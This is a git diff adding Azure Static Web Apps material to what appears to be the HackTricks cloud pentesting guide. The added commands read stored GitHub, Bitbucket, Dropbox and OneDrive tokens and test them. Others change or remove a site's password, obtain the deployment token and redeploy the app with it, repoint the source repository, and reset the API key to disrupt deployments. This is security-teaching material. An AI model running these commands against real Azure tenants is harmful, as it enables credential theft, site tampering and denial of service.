diff --git a/src/images/azure_static_password.png b/src/images/azure_static_password.png new file mode 100644 index 0000000000..9b11425160 Binary files /dev/null and b/src/images/azure_static_password.png differ diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index b5cb2fbde1..29bbc001de 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -105,7 +105,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\ -_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ +_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ ## References diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md index 026c9f96b0..66591865d8 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-static-web-apps-post-exploitation.md @@ -33,6 +33,48 @@ az rest \ }' ``` +### Read Configured Third Party Credentials + +As explained in the App Service section: + +{{#ref}} +../az-privilege-escalation/az-app-services-privesc.md +{{#endref}} + +Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one. + +```bash +az rest --method GET \ + --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" +``` + +This command returns tokens for Github, Bitbucket, Dropbox and OneDrive. + +Here you have some command examples to check the tokens: + +```bash +# GitHub – List Repositories +curl -H "Authorization: token " \ + -H "Accept: application/vnd.github.v3+json" \ + https://api.github.com/user/repos + +# Bitbucket – List Repositories +curl -H "Authorization: Bearer " \ + -H "Accept: application/json" \ + https://api.bitbucket.org/2.0/repositories + +# Dropbox – List Files in Root Folder +curl -X POST https://api.dropboxapi.com/2/files/list_folder \ + -H "Authorization: Bearer " \ + -H "Content-Type: application/json" \ + --data '{"path": ""}' + +# OneDrive – List Files in Root Folder +curl -H "Authorization: Bearer " \ + -H "Accept: application/json" \ + https://graph.microsoft.com/v1.0/me/drive/root/children +``` + ### Overwrite file - Overwrite routes, HTML, JS... It's possible to **overwritte a fie inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message. @@ -64,6 +106,77 @@ curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \ ``` +### Microsoft.Web/staticSites/config/write + +With this permission, it's possible to **modify the password** protecting a static web app or even unprotect every environment by sending a request such as the following: + +```bash +# Change password +az rest --method put \ +--url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ +--headers 'Content-Type=application/json' \ +--body '{ + "name": "basicAuth", + "type": "Microsoft.Web/staticSites/basicAuth", + "properties": { + "password": "SuperPassword123.", + "secretUrl": "", + "applicableEnvironmentsMode": "AllEnvironments" + } +}' + +# Remove the need of a password +az rest --method put \ +--url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ +--headers 'Content-Type=application/json' \ +--body '{ + "name": "basicAuth", + "type": "Microsoft.Web/staticSites/basicAuth", + "properties": { + "secretUrl": "", + "applicableEnvironmentsMode": "SpecifiedEnvironments", + "secretState": "None" + } +}' +``` + +### Microsoft.Web/staticSites/listSecrets/action + +This permission allows to get the **API key deployment token** for the static app. + +This token allows to deploy the app + +```bash +az rest --method POST \ +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//listSecrets?api-version=2023-01-01" +``` + +Then, in order to update an app you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future. + +1. Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo you want to deploy) and run `cd react-basic`. +2. Change the code you want to deploy +3. Deploy it running (Remember to change the ``): + +```bash +docker run -it --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN= INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose +``` + +### Microsoft.Web/staticSites/write + +With this permission it's possible to **change the source of the static web app to a different Github repository**, however, it won't be automatically provisioned as this must be done from a Github Action usually with the token that authorized the action as this token is not automatically updated inside the Githb secrets of the repo (it's just added automatically when the app is created). + +```bash +az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main +``` + +### Microsoft.Web/staticSites/resetapikey/action + +With this permision it's possible to **reset the API key of the static web app** potentially DoSing the workflows that automatically deploy the app. + +```bash +az rest --method POST \ + --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//resetapikey?api-version=2019-08-01" +``` {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md index b1a1ff429d..1ded8ded5f 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md @@ -44,7 +44,7 @@ You can change the user agent **manually** in the developer tools:
- Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). +Or use a [browser extension like this one](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en). ### Locations: Countries, IP ranges - Device Condition diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md index c31e441aba..2c626cbc1c 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md @@ -5,8 +5,63 @@ ## Static Web Apps Basic Information +Azure Static Web Apps is a cloud service for hosting **static web apps with automatic CI/CD from repositories like GitHub**. It offers global content delivery, serverless backends, and built-in HTTPS, making it secure and scalable. However, risks include misconfigured CORS, insufficient authentication, and content tampering, which can expose apps to attacks like XSS and data leakage if not properly managed. -- **Routes**: It's possible to change the routes of a static webapp by modifying the `staticwebapp.config.json` file. This file is located in the root of the repository and **contains the routes that the app will use**. +> [!TIP] +> When a Static App is created you can choose the **deployment authorization policy** between **Deployment token** and **GitHub Actions workflow**. + + +### Web App Authentication + +It's possible to **configure a password** to access the Web App. The web console allows to configure it to protect only staging environments or both staging and the production one. + +This is how at the time of writing a password protected web app looks like: + +
+ + +It's possible to see **if any password is being used** and which environments are protected with: + +```bash +az rest --method GET \ +--url "/subscriptions//resourceGroups/Resource_Group_1/providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2024-04-01" +``` + +However, this **won't show the password in clear text**, just something like: `"password": "**********************"`. + +### Routes + +Routes define **how incoming HTTP requests are handled** within a static web app. Configured in the **`staticwebapp.config.json`** file, they control URL rewriting, redirections, access restrictions, and role-based authorization, ensuring proper resource handling and security. + +Some example: + +```json +{ + "routes": [ + { + "route": "/", + "rewrite": "/index.html" + }, + { + "route": "/about", + "rewrite": "/about.html" + }, + { + "route": "/api/*", + "allowedRoles": ["authenticated"] + }, + { + "route": "/admin", + "redirect": "/login", + "statusCode": 302 + } + ], + "navigationFallback": { + "rewrite": "/index.html", + "exclude": ["/api/*", "/assets/*"] + } +} +``` ## Enumeration @@ -41,6 +96,11 @@ az rest --method POST \ ## Examples to generate Web Apps +You cna find a nice example to generate a web app in the following link: [https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github](https://learn.microsoft.com/en-us/azure/static-web-apps/get-started-portal?tabs=react&pivots=github) + +1. Fork the repository https://github.com/staticwebdev/react-basic/generate to your GitHub account and name it `my-first-static-web-app` +2. In the Azure portal create a Static Web App configuring the Github access and selecting th previously forked new repository +3. Create it, and wait some minutes, and check your new page! ## Post Exploitation diff --git a/src/pentesting-cloud/azure-security/az-services/image.png b/src/pentesting-cloud/azure-security/az-services/image.png new file mode 100644 index 0000000000..fc9c66aa01 Binary files /dev/null and b/src/pentesting-cloud/azure-security/az-services/image.png differ